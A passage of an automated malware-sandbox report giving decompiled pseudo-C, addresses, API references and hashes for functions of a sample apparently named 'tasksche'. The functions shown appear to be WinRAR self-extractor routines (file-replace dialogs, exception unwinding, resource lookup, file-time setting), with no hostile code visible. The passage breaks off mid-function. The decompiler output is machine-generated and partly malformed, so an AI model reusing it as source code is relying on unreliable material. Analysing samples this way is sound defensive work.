                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 5d2de00027b14f6e07390935bc826641c20494178e34cc3b56ee4834533d8747
                                                                                              • Instruction ID: 3f206ddc5264aa259e24750db78c3e6b08f6c9018291aa2998b68a3e9789e537
                                                                                              • Opcode Fuzzy Hash: 5d2de00027b14f6e07390935bc826641c20494178e34cc3b56ee4834533d8747
                                                                                              • Instruction Fuzzy Hash: FF115EB1600301AFD3305F659886BE7BBE8FB55315F60482FF6DAC6240D6B458C1CB18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E6CF(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				long _v0;
                                                                                              				WCHAR* _t16;
                                                                                              				int _t19;
                                                                                              				_Unknown_base(*)()* _t25;
                                                                                              
                                                                                              				 *0x441828 = _a12;
                                                                                              				 *0x44182c = _a16;
                                                                                              				 *0x441824 = _a20;
                                                                                              				if( *0x441830 == 0) {
                                                                                              					if( *0x441831 == 0) {
                                                                                              						_t25 = E0040DE5E;
                                                                                              						_t16 = L"REPLACEFILEDLG";
                                                                                              						while(1) {
                                                                                              							_t19 = DialogBoxParamW( *0x4335a4, _t16,  *0x441844, _t25, _a4);
                                                                                              							if(_t19 != 4) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if(DialogBoxParamW( *0x4335a8, L"RENAMEDLG",  *0x441840, E0040D3EE, _v0) != 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              						}
                                                                                              						return _t19;
                                                                                              					}
                                                                                              					return 1;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}







                                                                                              0x0040e6da
                                                                                              0x0040e6e3
                                                                                              0x0040e6ec
                                                                                              0x0040e6f1
                                                                                              0x0040e6fe
                                                                                              0x0040e70f
                                                                                              0x0040e714
                                                                                              0x0040e73b
                                                                                              0x0040e74f
                                                                                              0x0040e754
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e739
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e739
                                                                                              0x00000000
                                                                                              0x0040e75b
                                                                                              0x00000000
                                                                                              0x0040e702
                                                                                              0x00000000

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 9dc2c4e2a994375845b1e54b9a4a57574d7f38f83bee2a11927b5ffac3eaf025
                                                                                              • Instruction ID: 0892b1485419df81b4422e2148389c4265d0283c5dc75372e36aae0ff2247616
                                                                                              • Opcode Fuzzy Hash: 9dc2c4e2a994375845b1e54b9a4a57574d7f38f83bee2a11927b5ffac3eaf025
                                                                                              • Instruction Fuzzy Hash: AF017576604204BFC712AB55EC44A167BD5E74A751F040837F901E32B0D3764865DB6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 28%
                                                                                              			E0041E132(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				void* __ebp;
                                                                                              				void* _t20;
                                                                                              				void* _t22;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				intOrPtr* _t26;
                                                                                              				void* _t27;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_t27 = __esi;
                                                                                              				_t26 = __edi;
                                                                                              				_t25 = __edx;
                                                                                              				_t23 = __ecx;
                                                                                              				_t22 = __ebx;
                                                                                              				_t30 = _a20;
                                                                                              				if(_a20 != 0) {
                                                                                              					_push(_a20);
                                                                                              					_push(__ebx);
                                                                                              					_push(__esi);
                                                                                              					_push(_a4);
                                                                                              					E0041E0A0(__ebx, __edi, __esi, _t30);
                                                                                              					_t28 = _t28 + 0x10;
                                                                                              				}
                                                                                              				_t31 = _a28;
                                                                                              				_push(_a4);
                                                                                              				if(_a28 != 0) {
                                                                                              					_push(_a28);
                                                                                              				} else {
                                                                                              					_push(_t27);
                                                                                              				}
                                                                                              				E0041A12E(_t23);
                                                                                              				_push( *_t26);
                                                                                              				_push(_a16);
                                                                                              				_push(_a12);
                                                                                              				_push(_t27);
                                                                                              				E0041DB1D(_t22, _t25, _t26, _t27, _t31);
                                                                                              				_push(0x100);
                                                                                              				_push(_a24);
                                                                                              				_push(_a16);
                                                                                              				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                              				_push(_a8);
                                                                                              				_push(_t27);
                                                                                              				_push(_a4);
                                                                                              				_t20 = E0041DD85(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
                                                                                              				if(_t20 != 0) {
                                                                                              					E0041A0F5(_t20, _t27);
                                                                                              					return _t20;
                                                                                              				}
                                                                                              				return _t20;
                                                                                              			}











                                                                                              0x0041e132
                                                                                              0x0041e132
                                                                                              0x0041e132
                                                                                              0x0041e132
                                                                                              0x0041e132
                                                                                              0x0041e137
                                                                                              0x0041e13b
                                                                                              0x0041e13d
                                                                                              0x0041e140
                                                                                              0x0041e141
                                                                                              0x0041e142
                                                                                              0x0041e145
                                                                                              0x0041e14a
                                                                                              0x0041e14a
                                                                                              0x0041e14d
                                                                                              0x0041e151
                                                                                              0x0041e154
                                                                                              0x0041e159
                                                                                              0x0041e156
                                                                                              0x0041e156
                                                                                              0x0041e156
                                                                                              0x0041e15c
                                                                                              0x0041e161
                                                                                              0x0041e163
                                                                                              0x0041e166
                                                                                              0x0041e169
                                                                                              0x0041e16a
                                                                                              0x0041e172
                                                                                              0x0041e177
                                                                                              0x0041e17b
                                                                                              0x0041e17e
                                                                                              0x0041e181
                                                                                              0x0041e187
                                                                                              0x0041e188
                                                                                              0x0041e18b
                                                                                              0x0041e195
                                                                                              0x0041e199
                                                                                              0x00000000
                                                                                              0x0041e199
                                                                                              0x0041e19f

                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBCMT ref: 0041E145
                                                                                                • Part of subcall function 0041E0A0: ___BuildCatchObjectHelper.LIBCMT ref: 0041E0D6
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0041E15C
                                                                                              • ___FrameUnwindToState.LIBCMT ref: 0041E16A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                              • String ID: csm
                                                                                              • API String ID: 2163707966-1018135373
                                                                                              • Opcode ID: ffb5442ac62a4f85a48ef68d244cd4b92cff39c7c80ea712eb3c4bba393a9d17
                                                                                              • Instruction ID: 59b9ad28f981bea14fd5052789bebdc6dccf333051ec123e92fb5a6599f75b08
                                                                                              • Opcode Fuzzy Hash: ffb5442ac62a4f85a48ef68d244cd4b92cff39c7c80ea712eb3c4bba393a9d17
                                                                                              • Instruction Fuzzy Hash: 14012479401109BBDF126E52CC45EEB3F6AEF09398F044016FD1815261DB3AA8B1EBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0040C0F6(intOrPtr* __ecx) {
                                                                                              				char _v2052;
                                                                                              				struct HINSTANCE__* _t5;
                                                                                              				struct HRSRC__* _t6;
                                                                                              				signed int _t10;
                                                                                              				char _t12;
                                                                                              				intOrPtr* _t18;
                                                                                              
                                                                                              				_t18 = __ecx;
                                                                                              				_t5 = GetModuleHandleW(0);
                                                                                              				_t19 = L"RTL";
                                                                                              				_t6 = FindResourceW(_t5, L"RTL", 5);
                                                                                              				if(_t6 == 0) {
                                                                                              					E0040BF1D(_t18, L"LTR",  &_v2052, 0x400, 1, L"LTR");
                                                                                              					_t10 = E0041AA21( &_v2052, _t19);
                                                                                              					asm("sbb al, al");
                                                                                              					_t12 =  ~_t10 + 1;
                                                                                              					 *((char*)(_t18 + 0x10)) = _t12;
                                                                                              					return _t12;
                                                                                              				}
                                                                                              				 *((char*)(_t18 + 0x10)) = 1;
                                                                                              				return _t6;
                                                                                              			}









                                                                                              0x0040c103
                                                                                              0x0040c105
                                                                                              0x0040c10d
                                                                                              0x0040c114
                                                                                              0x0040c11c
                                                                                              0x0040c13b
                                                                                              0x0040c148
                                                                                              0x0040c14f
                                                                                              0x0040c152
                                                                                              0x0040c155
                                                                                              0x00000000
                                                                                              0x0040c155
                                                                                              0x0040c11e
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040C105
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040C114
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: LTR$RTL
                                                                                              • API String ID: 3537982541-719208805
                                                                                              • Opcode ID: f2852aa2e9ae8da3690023ec4cfec567c4dc869793b37f459442400b2d93c3ba
                                                                                              • Instruction ID: 3bee6f5c2cd76a6cf6446ed83b6680fa0d6a216d229c8f919e909fc3329ffe0a
                                                                                              • Opcode Fuzzy Hash: f2852aa2e9ae8da3690023ec4cfec567c4dc869793b37f459442400b2d93c3ba
                                                                                              • Instruction Fuzzy Hash: 69F0243238026467DA2067756C4AFE72B7CAB81310F44057AB605E71C1CFA8D499CBEE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 65%
                                                                                              			E00423463() {
                                                                                              				signed long long _v12;
                                                                                              				signed int _v20;
                                                                                              				signed long long _v28;
                                                                                              				signed char _t8;
                                                                                              
                                                                                              				_t8 = GetModuleHandleA("KERNEL32");
                                                                                              				if(_t8 == 0) {
                                                                                              					L6:
                                                                                              					_v20 =  *0x42b9d0;
                                                                                              					_v28 =  *0x42b9c8;
                                                                                              					asm("fsubr qword [ebp-0x18]");
                                                                                              					_v12 = _v28 / _v20 * _v20;
                                                                                              					asm("fld1");
                                                                                              					asm("fcomp qword [ebp-0x8]");
                                                                                              					asm("fnstsw ax");
                                                                                              					if((_t8 & 0x00000005) != 0) {
                                                                                              						return 0;
                                                                                              					} else {
                                                                                              						return 1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                              					if(__eax == 0) {
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_push(0);
                                                                                              						return __eax;
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x00423468
                                                                                              0x00423470
                                                                                              0x00423487
                                                                                              0x00423433
                                                                                              0x0042343c
                                                                                              0x00423448
                                                                                              0x0042344b
                                                                                              0x0042344e
                                                                                              0x00423450
                                                                                              0x00423453
                                                                                              0x00423458
                                                                                              0x00423462
                                                                                              0x0042345a
                                                                                              0x0042345e
                                                                                              0x0042345e
                                                                                              0x00423472
                                                                                              0x00423478
                                                                                              0x00423480
                                                                                              0x00000000
                                                                                              0x00423482
                                                                                              0x00423482
                                                                                              0x00423486
                                                                                              0x00423486
                                                                                              0x00423480

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0041D860), ref: 00423468
                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423478
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                              • API String ID: 1646373207-3105848591
                                                                                              • Opcode ID: 7ab99d9e72488d8bf21e4bf78f78cc33f843bd022a3d825351adfd90e0f12518
                                                                                              • Instruction ID: 925bd1e911d968a2cf7935e923f91739ef174afc765d351c528eb22c7f6e48fa
                                                                                              • Opcode Fuzzy Hash: 7ab99d9e72488d8bf21e4bf78f78cc33f843bd022a3d825351adfd90e0f12518
                                                                                              • Instruction Fuzzy Hash: C7F03060B00A1AD2DB116FA1BC1A67F7B78FB80742FD105D1D6D5E0084DF7885B1D38A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00419A36(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				struct _WNDCLASSEXW _v52;
                                                                                              				short _t17;
                                                                                              				intOrPtr* _t18;
                                                                                              				intOrPtr _t21;
                                                                                              
                                                                                              				_t21 = _a4;
                                                                                              				_t18 = __ecx;
                                                                                              				_v52.cbSize = 0x30;
                                                                                              				_v52.style = 0x828;
                                                                                              				_v52.lpfnWndProc = E004199EC;
                                                                                              				_v52.cbClsExtra = 0;
                                                                                              				_v52.cbWndExtra = 0;
                                                                                              				_v52.hInstance = _t21;
                                                                                              				_v52.hIcon = 0;
                                                                                              				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                                              				_v52.hbrBackground = 6;
                                                                                              				_v52.lpszMenuName = 0;
                                                                                              				_v52.lpszClassName = L"RarHtmlClassName";
                                                                                              				_v52.hIconSm = 0;
                                                                                              				_t17 = RegisterClassExW( &_v52);
                                                                                              				 *_t18 = _t21;
                                                                                              				return _t17;
                                                                                              			}







                                                                                              0x00419a3e
                                                                                              0x00419a4a
                                                                                              0x00419a4c
                                                                                              0x00419a53
                                                                                              0x00419a5a
                                                                                              0x00419a61
                                                                                              0x00419a64
                                                                                              0x00419a67
                                                                                              0x00419a6a
                                                                                              0x00419a73
                                                                                              0x00419a7a
                                                                                              0x00419a81
                                                                                              0x00419a84
                                                                                              0x00419a8b
                                                                                              0x00419a8e
                                                                                              0x00419a95
                                                                                              0x00419a9a

                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00419A6D
                                                                                              • RegisterClassExW.USER32 ref: 00419A8E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassCursorLoadRegister
                                                                                              • String ID: 0$RarHtmlClassName
                                                                                              • API String ID: 1693014935-3342523147
                                                                                              • Opcode ID: 191bbc33d2b33050640957ba9683b50acfea39c34108bf4aa43fc12e5a7eb183
                                                                                              • Instruction ID: b9ed7023dc6f3226d58ddf2044dfc6b29f2317d5cd4a011e6e0fd8f9270d308a
                                                                                              • Opcode Fuzzy Hash: 191bbc33d2b33050640957ba9683b50acfea39c34108bf4aa43fc12e5a7eb183
                                                                                              • Instruction Fuzzy Hash: 81F0F2B1D00228ABCB019F9AD844AEEFBF8FF98304F10805BE500B6250D7B916018FA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E00410E1C(signed char _a4) {
                                                                                              				struct HINSTANCE__* _t2;
                                                                                              
                                                                                              				_t2 = GetModuleHandleW(L"kernel32");
                                                                                              				if(_t2 != 0) {
                                                                                              					_t2 = GetProcAddress(_t2, "SetDllDirectoryW");
                                                                                              					if(_t2 != 0) {
                                                                                              						asm("sbb ecx, ecx");
                                                                                              						return _t2->i( ~(_a4 & 0x000000ff) & 0x0042a73c);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t2;
                                                                                              			}




                                                                                              0x00410e21
                                                                                              0x00410e29
                                                                                              0x00410e31
                                                                                              0x00410e39
                                                                                              0x00410e42
                                                                                              0x00000000
                                                                                              0x00410e4b
                                                                                              0x00410e39
                                                                                              0x00410e4d

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32,0040FF03,00000001), ref: 00410E21
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410E31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: SetDllDirectoryW$kernel32
                                                                                              • API String ID: 1646373207-2052158636
                                                                                              • Opcode ID: 613fa81eedf6cfefe4bb79f79fd7d80da4da150b27e50d1fb967e6d6e35de1a2
                                                                                              • Instruction ID: d1dc000951ac042e8af12af71ac4f40d64c7c6d3e89629ddd7054994e9706fe8
                                                                                              • Opcode Fuzzy Hash: 613fa81eedf6cfefe4bb79f79fd7d80da4da150b27e50d1fb967e6d6e35de1a2
                                                                                              • Instruction Fuzzy Hash: 2BD0A7B03243215797282B729C1AB2B65584B50F027944D3E7E0AC0080CA6DC0A0853F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E00409135(WCHAR* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
                                                                                              				signed char _v5;
                                                                                              				signed char _v6;
                                                                                              				signed char _v7;
                                                                                              				char _v8;
                                                                                              				void* _v12;
                                                                                              				signed char _v16;
                                                                                              				void* _v24;
                                                                                              				void* _v32;
                                                                                              				void* _v40;
                                                                                              				short _v4136;
                                                                                              				signed int* _t48;
                                                                                              				signed int* _t49;
                                                                                              				signed int* _t50;
                                                                                              				signed char _t51;
                                                                                              				void* _t52;
                                                                                              				void* _t63;
                                                                                              
                                                                                              				E0041AAF0(0x1024);
                                                                                              				_t48 = _a8;
                                                                                              				if(_t48 == 0) {
                                                                                              					L2:
                                                                                              					_v7 = 0;
                                                                                              				} else {
                                                                                              					_v7 = 1;
                                                                                              					if(( *_t48 | _t48[1]) == 0) {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              				_t49 = _a12;
                                                                                              				if(_t49 == 0) {
                                                                                              					L5:
                                                                                              					_v6 = 0;
                                                                                              				} else {
                                                                                              					_v6 = 1;
                                                                                              					if(( *_t49 | _t49[1]) == 0) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              				_t50 = _a16;
                                                                                              				if(_t50 == 0) {
                                                                                              					L8:
                                                                                              					_v5 = 0;
                                                                                              				} else {
                                                                                              					_v5 = 1;
                                                                                              					if(( *_t50 | _t50[1]) == 0) {
                                                                                              						goto L8;
                                                                                              					}
                                                                                              				}
                                                                                              				_t51 = E00409041(_a4);
                                                                                              				_v16 = _t51;
                                                                                              				if(_t51 == 0xffffffff || (_t51 & 0x00000001) == 0) {
                                                                                              					_v8 = 0;
                                                                                              				} else {
                                                                                              					_v8 = 1;
                                                                                              					E0040908D(_a4, 0);
                                                                                              				}
                                                                                              				_t52 = CreateFileW(_a4, 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                                                              				_v12 = _t52;
                                                                                              				if(_t52 != 0xffffffff) {
                                                                                              					L15:
                                                                                              					if(_v7 != 0) {
                                                                                              						E00411346(_a8,  &_v40);
                                                                                              					}
                                                                                              					if(_v6 != 0) {
                                                                                              						E00411346(_a12,  &_v32);
                                                                                              					}
                                                                                              					if(_v5 != 0) {
                                                                                              						E00411346(_a16,  &_v24);
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					asm("sbb eax, eax");
                                                                                              					asm("sbb eax, eax");
                                                                                              					SetFileTime(_v12,  ~(_v6 & 0x000000ff) &  &_v32,  ~(_v5 & 0x000000ff) &  &_v24,  ~(_v7 & 0x000000ff) &  &_v40);
                                                                                              					_t63 = CloseHandle(_v12);
                                                                                              					if(_v8 != 0) {
                                                                                              						return E0040908D(_a4, _v16);
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t63 = E0040A3DC(_a4,  &_v4136, 0x800);
                                                                                              					if(_t63 != 0) {
                                                                                              						_t63 = CreateFileW( &_v4136, 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                                                              						_v12 = _t63;
                                                                                              						if(_t63 != 0xffffffff) {
                                                                                              							goto L15;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t63;
                                                                                              			}



















                                                                                              0x0040913d
                                                                                              0x00409142
                                                                                              0x0040914c
                                                                                              0x00409159
                                                                                              0x00409159
                                                                                              0x0040914e
                                                                                              0x00409153
                                                                                              0x00409157
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409157
                                                                                              0x0040915d
                                                                                              0x00409162
                                                                                              0x0040916f
                                                                                              0x0040916f
                                                                                              0x00409164
                                                                                              0x00409169
                                                                                              0x0040916d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040916d
                                                                                              0x00409173
                                                                                              0x00409178
                                                                                              0x00409185
                                                                                              0x00409185
                                                                                              0x0040917a
                                                                                              0x0040917f
                                                                                              0x00409183
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409183
                                                                                              0x0040918c
                                                                                              0x00409191
                                                                                              0x00409197
                                                                                              0x0040929c
                                                                                              0x004091a5
                                                                                              0x004091a9
                                                                                              0x004091ad
                                                                                              0x004091ad
                                                                                              0x004091cd
                                                                                              0x004091cf
                                                                                              0x004091d5
                                                                                              0x00409212
                                                                                              0x00409216
                                                                                              0x0040921f
                                                                                              0x0040921f
                                                                                              0x00409228
                                                                                              0x00409231
                                                                                              0x00409231
                                                                                              0x0040923a
                                                                                              0x00409243
                                                                                              0x00409243
                                                                                              0x0040924e
                                                                                              0x0040925c
                                                                                              0x0040926a
                                                                                              0x00409275
                                                                                              0x0040927e
                                                                                              0x00409288
                                                                                              0x00000000
                                                                                              0x00409290
                                                                                              0x004091d7
                                                                                              0x004091e6
                                                                                              0x004091ed
                                                                                              0x00409204
                                                                                              0x00409206
                                                                                              0x0040920c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040920c
                                                                                              0x004091ed
                                                                                              0x00409299

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00407536,?,?,?), ref: 004091CD
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00407536,?,?,?,?), ref: 00409204
                                                                                              • SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,00407536,?,?,?,?), ref: 00409275
                                                                                              • CloseHandle.KERNEL32(?,?,00407536,?,?,?,?), ref: 0040927E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: 6a8276f57ee53cdbc91cc020f39a17d418f5c9fb0df3296a94224ec9e042af11
                                                                                              • Instruction ID: 149005b1c5d3a5dbb79089aff48ec9cca0dae1d541df05bff41c4f18bd56acf5
                                                                                              • Opcode Fuzzy Hash: 6a8276f57ee53cdbc91cc020f39a17d418f5c9fb0df3296a94224ec9e042af11
                                                                                              • Instruction Fuzzy Hash: 1141A131A00248BEEF12DBA4CC49FEE7BB89F05304F1445AAF851BB2D2C6789E45D755
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00424FCE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				char _v8;
                                                                                              				signed int _v12;
                                                                                              				char _v20;
                                                                                              				char _t43;
                                                                                              				char _t46;
                                                                                              				signed int _t53;
                                                                                              				signed int _t54;
                                                                                              				intOrPtr _t56;
                                                                                              				int _t57;
                                                                                              				int _t58;
                                                                                              				signed short* _t59;
                                                                                              				short* _t60;
                                                                                              				int _t65;
                                                                                              				char* _t72;
                                                                                              
                                                                                              				_t72 = _a8;
